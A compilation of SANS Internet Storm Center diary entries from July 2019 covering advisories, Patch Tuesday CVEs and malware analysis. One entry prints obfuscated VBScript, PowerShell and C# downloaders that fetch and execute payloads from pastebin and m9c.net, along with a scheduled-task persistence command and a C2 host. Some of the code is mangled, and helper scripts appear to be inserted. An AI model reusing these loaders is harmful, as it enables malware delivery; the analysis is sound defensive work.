VMWare Security Advisory on DoS Vulnerability in ESXi, (Tue, Jul 9th)

VMWare has released patches for ESXi that address a denial of service vulnerability in hostd. ESXi 6.0 is unaffected, 6.5 has a patch, and 6.7 has a patch pending. This addresses the vulnerability described in CVE-2019-5528 and is rated important (CVSSv3 = 5.3). A workaround has also been published. If you run ESXi, you should take a look at this today as well.

 


John Bambenek
bambenek at gmail /dot/ com
ThreatSTOP

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

MSFT July 2019 Patch Tuesday, (Tue, Jul 9th)

July 2019 Security Updates

| Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
|---|---|---|---|---|---|---|---|---|
| .NET Denial of Service Vulnerability | CVE-2019-1083 | No | No | Less Likely | Less Likely | Important | | |
| .NET Framework Remote Code Execution Vulnerability | CVE-2019-1113 | No | No | More Likely | More Likely | Critical | | |
| ADFS Security Feature Bypass Vulnerability | CVE-2019-0975 | No | No | Less Likely | Less Likely | Important | 4.3 | 3.9 |
| ADFS Security Feature Bypass Vulnerability | CVE-2019-1126 | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8 |
| ASP.NET Core Spoofing Vulnerability | CVE-2019-1075 | No | No | Less Likely | Less Likely | Moderate | | |
| Azure Automation Elevation of Privilege Vulnerability | CVE-2019-0962 | Yes | No | Less Likely | Less Likely | Important | | |
| Azure DevOps Server and Team Foundation Server Remote Code Execution Vulnerability | CVE-2019-1072 | No | No | Less Likely | Less Likely | Critical | | |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1062 | No | No | | | Critical | 4.2 | 3.8 |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1092 | No | No | | | Critical | 4.2 | 3.8 |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1103 | No | No | | | Critical | 4.2 | 3.8 |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1106 | No | No | | | Critical | 4.2 | 3.8 |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1107 | No | No | | | Critical | 4.2 | 3.8 |
| DirectWrite Information Disclosure Vulnerability | CVE-2019-1093 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| DirectWrite Information Disclosure Vulnerability | CVE-2019-1097 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1117 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1118 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1119 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1120 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1121 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1122 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1123 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1124 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1127 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Remote Code Execution Vulnerability | CVE-2019-1128 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectX Elevation of Privilege Vulnerability | CVE-2019-0999 | No | No | | | Important | 7.8 | 7.0 |
| Docker Elevation of Privilege Vulnerability | CVE-2018-15664 | Yes | No | Less Likely | Less Likely | Important | | |
| GDI+ Remote Code Execution Vulnerability | CVE-2019-1102 | No | No | Less Likely | Less Likely | Critical | 8.4 | 7.6 |
| Internet Explorer Memory Corruption Vulnerability | CVE-2019-1063 | No | No | More Likely | More Likely | Critical | 6.4 | 5.8 |
| Latest Servicing Stack Updates | ADV990001 | No | No | | | Critical | | |
| Microsoft Browser Memory Corruption Vulnerability | CVE-2019-1104 | No | No | More Likely | More Likely | Critical | 6.4 | 5.8 |
| Microsoft Excel Information Disclosure Vulnerability | CVE-2019-1112 | No | No | More Likely | More Likely | Important | | |
| Microsoft Excel Remote Code Execution Vulnerability | CVE-2019-1110 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Excel Remote Code Execution Vulnerability | CVE-2019-1111 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Exchange Information Disclosure Vulnerability | CVE-2019-1084 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Exchange Server Elevation of Privilege Vulnerability | CVE-2019-1136 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Exchange Server Spoofing Vulnerability | CVE-2019-1137 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Office SharePoint XSS Vulnerability | CVE-2019-1134 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Office Spoofing Vulnerability | CVE-2019-1109 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft SQL Server Remote Code Execution Vulnerability | CVE-2019-1068 | Yes | No | Less Likely | Less Likely | Important | | |
| Microsoft Windows Elevation of Privilege Vulnerability | CVE-2019-1074 | No | No | More Likely | More Likely | Important | 5.3 | 5.3 |
| Microsoft Windows Elevation of Privilege Vulnerability | CVE-2019-1082 | No | No | | | Important | 7.7 | 7.7 |
| Microsoft splwow64 Elevation of Privilege Vulnerability | CVE-2019-0880 | No | Yes | Detected | More Likely | Important | 7.0 | 6.3 |
| Microsoft unistore.dll Information Disclosure Vulnerability | CVE-2019-1091 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Outlook on the web Cross-Site Scripting Vulnerability | ADV190021 | No | No | | | Important | | |
| Remote Desktop Protocol Client Information Disclosure Vulnerability | CVE-2019-1108 | No | No | More Likely | More Likely | Important | 6.5 | 5.9 |
| Remote Desktop Services Remote Code Execution Vulnerability | CVE-2019-0887 | Yes | No | More Likely | More Likely | Important | 8.0 | 7.2 |
| Scripting Engine Memory Corruption Vulnerability | CVE-2019-1056 | No | No | | | Critical | 6.4 | 5.8 |
| Scripting Engine Memory Corruption Vulnerability | CVE-2019-1059 | No | No | Less Likely | Less Likely | Critical | 6.4 | 5.8 |
| Scripting Engine Memory Corruption Vulnerability | CVE-2019-1001 | No | No | More Likely | More Likely | Critical | 6.4 | 5.8 |
| Scripting Engine Memory Corruption Vulnerability | CVE-2019-1004 | No | No | More Likely | More Likely | Critical | 6.4 | 5.8 |
| SymCrypt Denial of Service Vulnerability | CVE-2019-0865 | Yes | No | Less Likely | Less Likely | Important | 7.5 | 6.7 |
| Team Foundation Server Cross-site Scripting Vulnerability | CVE-2019-1076 | No | No | Less Likely | Less Likely | Important | | |
| Visual Studio Elevation of Privilege Vulnerability | CVE-2019-1077 | No | No | Less Likely | Less Likely | Important | | |
| Visual Studio Information Disclosure Vulnerability | CVE-2019-1079 | No | No | Less Likely | Less Likely | Important | | |
| WCF/WIF SAML Token Authentication Bypass Vulnerability | CVE-2019-1006 | No | No | Less Likely | Less Likely | Important | | |
| Win32k Elevation of Privilege Vulnerability | CVE-2019-1132 | No | Yes | | | Important | 7.8 | 7.2 |
| Win32k Information Disclosure Vulnerability | CVE-2019-1096 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Windows Audio Service Elevation of Privilege Vulnerability | CVE-2019-1086 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows Audio Service Elevation of Privilege Vulnerability | CVE-2019-1087 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows Audio Service Elevation of Privilege Vulnerability | CVE-2019-1088 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows DHCP Server Remote Code Execution Vulnerability | CVE-2019-0785 | No | No | Less Likely | Less Likely | Critical | 9.8 | 8.8 |
| Windows DNS Server Denial of Service Vulnerability | CVE-2019-0811 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.7 |
| Windows Elevation of Privilege Vulnerability | CVE-2019-1129 | Yes | No | More Likely | More Likely | Important | 7.8 | 7.0 |
| Windows Elevation of Privilege Vulnerability | CVE-2019-1130 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows Error Reporting Elevation of Privilege Vulnerability | CVE-2019-1037 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-1094 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-1095 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-1098 | No | No | | | Important | 5.5 | 5.0 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-1099 | No | No | | | Important | 5.5 | 5.0 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-1100 | No | No | | | Important | 5.5 | 5.0 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-1101 | No | No | | | Important | 5.5 | 5.0 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-1116 | No | No | | | Important | 5.5 | 5.0 |
| Windows Hyper-V Denial of Service Vulnerability | CVE-2019-0966 | No | No | Less Likely | Less Likely | Important | 6.8 | 6.1 |
| Windows Kernel Elevation of Privilege Vulnerability | CVE-2019-1067 | No | No | More Likely | More Likely | Important | 7.8 | 7.0 |
| Windows Kernel Information Disclosure Vulnerability | CVE-2019-1071 | No | No | More Likely | More Likely | Important | 5.5 | 5.0 |
| Windows Kernel Information Disclosure Vulnerability | CVE-2019-1073 | No | No | More Likely | More Likely | Important | 5.5 | 5.0 |
| Windows RPCSS Elevation of Privilege Vulnerability | CVE-2019-1089 | No | No | More Likely | More Likely | Important | 7.8 | 7.0 |
| Windows WLAN Service Elevation of Privilege Vulnerability | CVE-2019-1085 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows dnsrlvr.dll Elevation of Privilege Vulnerability | CVE-2019-1090 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |

 


John Bambenek
bambenek at gmail /dot/ com
ThreatSTOP

Solving the WHOIS and Privacy Problem: A Draft of Implementing WHOIS in DNS, (Tue, Jul 9th)

Recently, due to GDPR, WHOIS records for domains have been redacted in many places and access to the information that has been relied on by investigators and abuse fighters is either much harder to get or simply unavailable. In theory, ICANN should be setting up a gated system that will give tiered access to various classes of people, but having participated in those discussions, it does not seem such a system would allow for access to the data we need to investigate, correlate, and respond to abuse and cybercrime.

To help solve this problem, fellow handler Richard Porter and I have created an Internet-Draft to put information formerly available in WHOIS into DNS TXT records, so that the information can be voluntarily made available by domain owners. This allows programmatic access that can be used in automation to make policy decisions quickly (for instance, should I accept email from this domain?). The gist of the proposal is to use a _whois subdomain record and have a variety of TXT records for administrative, technical, network, and security/abuse contacts (name, phone number, email, address). As the system relies on self-disclosure, it bypasses some of the stickier issues with privacy laws.

Take a look and chime in on your thoughts in comments or on the DNSOP mailing list where this is being discussed.


John Bambenek
bambenek at gmail /dot/ com
ThreatSTOP

Machine Code? No!, (Mon, Jul 8th)

On the 4th of July, I posted diary entry “Machine Code?” with the following screenshot:

This is disassembler output from the “Netwide Assembler” for 32-bit code.

What was the content of the binary file? This:

4th of July

I wanted to illustrate that an x86 disassembler will always produce output, even if you provide it input that is “not real” machine code.

Some time ago, I had a friend analyze a capture file: suspecting an exploit, he took the data out of a TCP packet and disassembled it. He was not familiar with assembler code or machine language, but since the disassembler produced a listing (without errors), he concluded that the data he found in that packet must be shellcode.

I explained to him that this was not the case: a disassembler will do its best to produce a listing whatever input you give it. It’s up to the analyst to understand the purpose of the disassembled program, and to decide whether it is indeed a program at all.

And that’s not easy: it requires skill, especially with obfuscated shellcode.

If you don’t have these skills, then there are still other methods you can use to determine if you are dealing with shellcode. One method is dynamic analysis: execute it, and see what happens.

I refer to diary entry “Analyzing Encoded Shellcode with scdbg” if you want to know more.

Conclusion: being able to produce a disassembly listing is not a reliable detection method for shellcode.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

OpSec and OSInt , (Sun, Jul 7th)

Operations security (OpSec) is a military term that has evolved into the InfoSec realm. In a military context, OpSec describes a process that identifies critical information to determine whether friendly actions can be learned or observed by enemy intelligence, and whether the information obtained by the enemy could be useful to subvert operations.

In the InfoSec realm, OpSec is the process of determining what information is publicly available about an organization, and whether that information, either individually or in aggregate, could be used by a nefarious individual to do damage to the organization.

A trivial example of where publicly available information could be used by the bad guys is spear phishing. The list of company executives taken off a company website, combined with the format of the corporate email addresses, can be used to craft and deliver a spear phishing email.

Open Source Intelligence (OSInt) is the process of determining what information is publicly available.

There are many tools available to assist with OSInt, starting with Google, but finding the right tools to sift through the myriad types of information is difficult. An excellent resource for finding those tools is the OSInt Framework. The OSInt Framework is a huge mindmap of available OSInt tools, classified by the type(s) of data they are useful for.

In the last couple of weeks I stumbled on a creative use for OSInt. A non-profit organization called Trace Labs is using crowd-sourced Open Source Intelligence to gather verified information for missing person cases. After a few weeks of information gathering, the information is turned over to the police. They have also gamified the OSInt process through virtual capture the flag (CTF) events as well as CTF events at BSides and other conferences. Trace Labs' next virtual CTF event is on Saturday, July 13th.
 

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

Malicious XSL Files, (Sat, Jul 6th)

In yesterday’s diary entry “A ‘Stream O’ Maldoc”, the payload was an XSL/XSLT file.

Now, malicious XSL files will not execute just by double-clicking them. On a default Windows install, Internet Explorer will be launched to display the content of the file as XML:

But in this case, the malicious Word document contains VBA code that will launch a WMIC query with the XSL file as stylesheet:

This results in the execution of the code inside the XSL file, as discovered and reported by subTee/Casey Smith last year.
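
From the defender's side, the interesting signal is the WMIC invocation itself: a stylesheet argument that is not one of WMIC's built-in output formats, or wmic.exe spawned by an Office application, as in the chain above. The following is an added detection sketch (mine, not from the diary) that runs over constructed process-creation events; the event field names, the list of built-in format names and all sample command lines are assumptions, not taken from the diary's sample.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events in the shape a Sysmon/EDR export might give.
# Field names are an assumption; none of these lines come from the diary's sample.
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "wmic.exe",
     "cmdline": 'wmic os get /format:"C:\\Users\\victim\\AppData\\Local\\Temp\\update.xsl"'},
    {"parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": "wmic os get caption"},
    {"parent": "explorer.exe", "image": "wmic.exe",
     "cmdline": "wmic process list brief /format:list"},
    {"parent": "EXCEL.EXE", "image": "wmic.exe",
     "cmdline": "wmic process get brief /format:http://example.invalid/style.xsl"},
    {"parent": "svchost.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe /format:evil.xsl"},
]

# Built-in WMIC output formats (assumed list); anything else is a stylesheet file or URL.
BUILTIN_FORMATS = {"csv", "hform", "htable", "list", "mof", "rawxml", "table",
                   "textvaluelist", "value", "xml"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)


def wmic_stylesheet(cmdline: str) -> Optional[str]:
    """Return the /format: argument of a wmic command line, or None if absent."""
    m = FORMAT_RE.search(cmdline)
    return m.group(1) if m else None


def classify(event: Dict[str, str]) -> List[str]:
    """Reasons this event deserves analyst attention; an empty list means nothing seen."""
    reasons: List[str] = []
    if event["image"].lower() != "wmic.exe":
        return reasons
    fmt = wmic_stylesheet(event["cmdline"])
    if fmt is not None:
        name = fmt.lower()
        if name.startswith(("http://", "https://", "\\\\")):
            reasons.append("wmic /format: points at a remote stylesheet")
        elif name not in BUILTIN_FORMATS:
            reasons.append("wmic /format: points at a non-built-in stylesheet file")
    if event["parent"].lower() in OFFICE_PARENTS:
        reasons.append("wmic.exe spawned by an Office application")
    return reasons


def scan(events: List[Dict[str, str]]):
    """Return [(cmdline, reasons)] for every event that produced at least one reason."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append((ev["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print(cmdline)
        for r in reasons:
            print("   ->", r)
```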

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

A "Stream O" Maldoc, (Fri, Jul 5th)

Reader Robert submitted a malicious document. It just happens to be a maldoc with the payload hidden in a user form, as discussed in diary entry “Maldoc: Payloads in User Forms” last weekend.

I’m using the plugin_stream_o plugin to view the payload.

This output is more user-friendly: it’s an XSL/XSLT file with malicious JScript, a downloader:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Machine Code?, (Thu, Jul 4th)

A slightly unusual diary entry for this day.

Do you recognize this disassembler output?

If not, don’t spend time on it, I’ll give more details in tomorrow’s diary entry.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Malicious Script With Multiple Payloads, (Tue, Jul 2nd)

Pastebin.com remains a common place from which malicious data and/or scripts are downloaded. A few days ago, I spotted this malicious script that got a very low score on VT: 3/57 (SHA256:45e45d2932816b14665f65ee4fc1aa7473b29031da1612d3d909f867c618d80e)[1]. The obfuscation isn’t very complex but remains quite effective. The script is just a downloader that fetches more content from pastebin.com as well as other sites.

A first payload is downloaded from pastebin.com:

Set As_wW = CreateObject("WScript.Shell")
Dim AXW
AXW1 = "pt.Shell"").Run(""powershell.exe -noexi"
AXW5 = "ng('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)"
AXW2 = "t -command [Reflection.Assembly]::Load("
AXW4 = "-Object Net.WebClient).DownloadStri"
AXW0 = "cmd.exe /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject(""Wscri"
AXW3 = "[System.Convert]::FromBase64String((New"
AXW = AXW0 + AXW1 + AXW2 + AXW3 + AXW4 + AXW5
As_wW.Run AXW, vbHide

The decoded command is:

cmd.exe /c ping 127.0.0.1 -n 10 > nul & 
mshta.exe vbscript:CreateObject("Wscript.Shell").Run(""powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('hxxps://pastebin[.]com/raw/e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)
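
Reassembling this kind of out-of-order string concatenation by hand is error-prone, so here is an added Python helper (mine, not part of the diary) that collects the VBScript string literals, unescapes the doubled quotes, and resolves the `x = a + b + ...` lines. It runs on a constructed, harmless script written in the same style as the sample above; the variable names and the command it rebuilds are my own.

```python
import re
from typing import Dict

# Constructed VBScript in the same style as the diary's downloader: fragments
# assigned out of order, VBScript "" escapes inside the literals, then glued
# together with + (or &). Not the diary's sample; the rebuilt command is harmless.
SAMPLE_VBS = r'''
Set objShell = CreateObject("WScript.Shell")
Dim Cmd
Cmd1 = "o ""hello"
Cmd3 = "d"" & exit"
Cmd0 = "cmd.exe /c ech"
Cmd2 = " worl"
Cmd = Cmd0 + Cmd1 + Cmd2 + Cmd3
objShell.Run Cmd, vbHide
'''

# name = "literal"   (a literal may contain "" which VBScript reads as one ")
LITERAL_RE = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"]|"")*)"\s*$')
# name = a + b & c   (only bare identifiers: the concatenation lines we want)
CONCAT_RE = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*[+&]\s*\w+)+)\s*$')


def collect_literals(script: str) -> Dict[str, str]:
    """Map each variable assigned a plain string literal to its unescaped value."""
    literals: Dict[str, str] = {}
    for line in script.splitlines():
        m = LITERAL_RE.match(line)
        if m:
            literals[m.group(1)] = m.group(2).replace('""', '"')
    return literals


def deobfuscate(script: str) -> Dict[str, str]:
    """Resolve every `x = a + b + ...` line using the literals found in the script.

    Returns {variable: reassembled string}. Later concatenations may reuse earlier
    results, which covers multi-level splitting. Unknown parts are left as <name?>.
    """
    values = collect_literals(script)
    resolved: Dict[str, str] = {}
    for line in script.splitlines():
        m = CONCAT_RE.match(line)
        if not m:
            continue
        parts = re.split(r'\s*[+&]\s*', m.group(2).strip())
        joined = "".join(values.get(p, f"<{p}?>") for p in parts)
        values[m.group(1)] = joined
        resolved[m.group(1)] = joined
    return resolved


if __name__ == "__main__":
    for name, text in deobfuscate(SAMPLE_VBS).items():
        print(f"{name} = {text}")
```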

Let’s have a look at the pastie:

isc> curl -s hxxps://pastebin[.]com/raw/e8GrYbHb| head -c 100
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB

You immediately recognise a PE file:

isc> curl -s https://pastebin[.]com/raw/e8GrYbHb| base64 -d | sha256sum
8d54da80492eefcb1b688be56a18d2ea353aaa2d02b09256d5f3c9803104a1bf -

The file has a score of 17/72 on VT[2]

Then, a second payload is downloaded:

Set shell = CreateObject("WScript.Shell")
shell.Run("Powershell.exe -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.m9c.net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[AppDomain]::('^urrentDomain'.replace('^','C')).('%oad'.replace('%','L'))($sc64).'EntryPoint'.('[email protected]'.replace('g','e').replace('@','v'))($null,$null)"),0

Let’s have a look at this payload:

isc> curl -s hxxp://www.m9c[.]net/uploads/15615146751.jpg | head -c 100
    0x4D, 0x5A, 0x90, 0*0, 0*3, 0*0, 0*0, 0*0, 0*4, 0*0, 0*0, 0*0,
    0xFF, 0xFF, 0*0, 0*0, 0xB8, 0*0, 0

Again, a PE file (0x4D, 0x5A == “MZ”). It can be easily decoded with a tool like CyberChef via a bunch of search/replace operations and converting from hex characters. The file is unknown on VT (SHA256:86e29714187bdfe606ca791e83f48263e590598b9f466ff5bf6a7ce99a4e54d3)
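
The same triage can be scripted offline. The following is an added Python helper (mine, not from the diary) that undoes the `*` to `x0` substitution exactly as the loader's `.replace('*','x0')` does, decodes a base64 prefix such as the `head -c 100` output above, and reads the DOS header to report the MZ magic, e_lfanew and whether the PE signature is reachable in what was captured. The base64 head is rebuilt from the excerpt above (36 chars, 44 `A`s, 20 chars); the hex array extends the excerpt above with a few constructed zero bytes.

```python
import base64
import hashlib
import re
import struct
from typing import Dict

# First payload: the 100-character head shown above, rebuilt from its three parts.
FIRST_PAYLOAD_B64_HEAD = ("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAA"
                          + "A" * 44
                          + "gAAAAA4fug4AtAnNIbgB")

# Second payload: the obfuscated hex array, continued with constructed zero bytes.
SECOND_PAYLOAD_STAR_HEX = """
    0x4D, 0x5A, 0x90, 0*0, 0*3, 0*0, 0*0, 0*0, 0*4, 0*0, 0*0, 0*0,
    0xFF, 0xFF, 0*0, 0*0, 0xB8, 0*0, 0*0, 0*0,
"""


def decode_star_hex(text: str) -> bytes:
    """Undo the '*' -> 'x0' substitution used by the loader and parse the byte array."""
    restored = text.replace("*", "x0")          # 0*3 -> 0x03, as the PowerShell .replace did
    tokens = re.findall(r"0x([0-9A-Fa-f]{1,2})\b", restored)
    return bytes(int(t, 16) for t in tokens)


def decode_b64_head(text: str) -> bytes:
    """Decode a base64 prefix, dropping a trailing partial quantum (head -c cuts anywhere)."""
    clean = re.sub(r"[^A-Za-z0-9+/=]", "", text)
    clean = clean[: len(clean) - len(clean) % 4]
    return base64.b64decode(clean)


def pe_triage(data: bytes) -> Dict[str, object]:
    """Cheap static checks on a (possibly truncated) blob: MZ magic, e_lfanew, PE signature."""
    info: Dict[str, object] = {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "is_mz": data[:2] == b"MZ",
        "e_lfanew": None,
        "pe_signature_seen": False,
        "truncated": False,
    }
    if len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of the "PE\0\0" header
        info["e_lfanew"] = e_lfanew
        if len(data) >= e_lfanew + 4:
            info["pe_signature_seen"] = data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
        else:
            info["truncated"] = True    # header points past what we have
    else:
        info["truncated"] = True        # not even a full DOS header
    return info


if __name__ == "__main__":
    print("first payload :", pe_triage(decode_b64_head(FIRST_PAYLOAD_B64_HEAD)))
    print("second payload:", pe_triage(decode_star_hex(SECOND_PAYLOAD_STAR_HEX)))
```

With only the first 100 characters captured, both blobs report `truncated`; the full downloads are needed before the PE signature check means anything.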

The third payload is again grabbed from pastebin:

isc> curl -s hxxps://pastebin[.]com/raw/2HpiMFUJ

'============Checking the system architecture=========================================
Set oShell = CreateObject ("Wscript.Shell")
Dim strArgs
strArgs = "powershell -noexit $Script = Invoke-WebRequest 'hxxps://pastebin[.]com/raw/9NQF7jy5';$ScriptBlock = [Scriptblock]::Create($Script.Content);Invoke-Command -ScriptBlock $ScriptBlock -ArgumentList ($args + @('someargument'));"
oShell.Run strArgs, 0, false
self.close

And the next payload is:

isc> curl -s hxxps://pastebin[.]com/raw/9NQF7jy5
$code = @"
using System.Net;
using System.Reflection;
using System;
using System.Threading;
namespace CDTPitbull
{
    public class Cat
    {
        public void Run()
        {
            using (WebClient wc = new WebClient())
            {
               // new Thread(() =>
              //  {
                    try
                    {
                        Assembly asm = AppDomain.CurrentDomain.Load(Convert.FromBase64String(wc.DownloadString("hxxps://pastebin[.]com/raw/3qSWYxTb")));
                        MethodInfo Metinf = asm.EntryPoint;
                        object InjObj = asm.CreateInstance(Metinf.Name);
                        object[] parameters = new object[1];  // C#
                        if (Metinf.GetParameters().Length == 0)
                        {
                            parameters = null; // VB.NET
                        }
                        Metinf.Invoke(InjObj, parameters);
                    }
                    catch { return; }
              //  })
              //  { IsBackground = false }.Start();
            }
        }
    }
}
"@

Add-Type -TypeDefinition $code;
$instance = New-Object CDTPitbull.Cat;
$instance.Run();

And the last one is again a PE file:

isc> curl -s https://pastebin.com/raw/3qSWYxTb | head -c 100
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB
isc> curl -s https://pastebin.com/raw/3qSWYxTb | base64 -d | sha256sum
55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f  -

This payload has a score of 24/70 on VT[3] (SHA256:55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f)

Persistence is achieved by creating a scheduled task:

cmd.exe /c ping 127.0.0.1 -n 30 > nul & schtasks /create /sc MINUTE /mo 200 /tn "MicrosoftWin32" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe hxxps://pastebin[.]com/raw/2HpiMFUJ",0,true)(window.close)" /F

Finally, any running Excel or Word instances are killed:

Set X7W832DSA = CreateObject("WScript.Shell")
Dim ASSd712ji8asd
ASSd712ji8asd = "cmd.exe /c cd ""%ProgramFiles%""  & taskkill /f /im EXCEL.EXE & taskkill /f /im WINWORD.EXE & exit"
X7W832DSA.Run ASSd712ji8asd, vbHide

I don’t know the purpose of this…

It’s a RAT trying to connect to the following C2 server: bylgay[.]hopto[.]org (152[.]245[.]159[.]90)

[1] https://www.virustotal.com/gui/file/45e45d2932816b14665f65ee4fc1aa7473b29031da1612d3d909f867c618d80e/detection
[2] https://www.virustotal.com/gui/file/8d54da80492eefcb1b688be56a18d2ea353aaa2d02b09256d5f3c9803104a1bf/detection
[3] https://www.virustotal.com/gui/file/55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

Using Powershell in Basic Incident Response – A Domain Wide "Kill-Switch", (Tue, Jul 2nd)

Now that we have the hashes for all the running processes in the AD Domain, and also have the VT score for each hash in the system, how can we use this information? Incident Response comes immediately to mind for me. If you’ve ever been in a medium-to-large-scale “incident”, the situation you often find is: “we know everything seems to be infected, but out of thousands of machines, which ones are actually infected right now?” Not only that, but “our AV doesn’t detect this exact malware yet, or if it does, it detects it but doesn’t kill it or delete it”. The methods we’ve looked at these last few days allow us to enumerate an up-to-the-minute list of infected stations, outputting a “punch list” for the responders fixing those stations. Not only that, but we can tack on a “kill switch” command that will terminate (and even delete) the running malware if the AV product isn’t doing that.

What we don’t want to do is automate this too much or too soon: don’t take the VirusTotal listing and run any global kill-process code based on just that! You might, for instance, see a hash collision and kill a good process. Or, much more likely, one AV vendor in the VT pool (66 vendors as of today) could return a false positive for our hash. And if one vendor returns a false positive, you’ll likely find 5 or 6 more vendors whose first automation step is “copy that other vendor’s result”. So one false positive almost always ramps up to 4-5-6-7 in short order, and ramping back down to zero will often take longer than the ramp-up.

What we want to do is take all of our inputs into account to ensure that the file hash is a true IoC for the current infection. At this point, should we use the output of our first script? The short answer is “NO”! The Windows process IDs may have changed, and we likely don’t want to go killing processes by name (unless we are very sure that we don’t have a name collision in our infection).

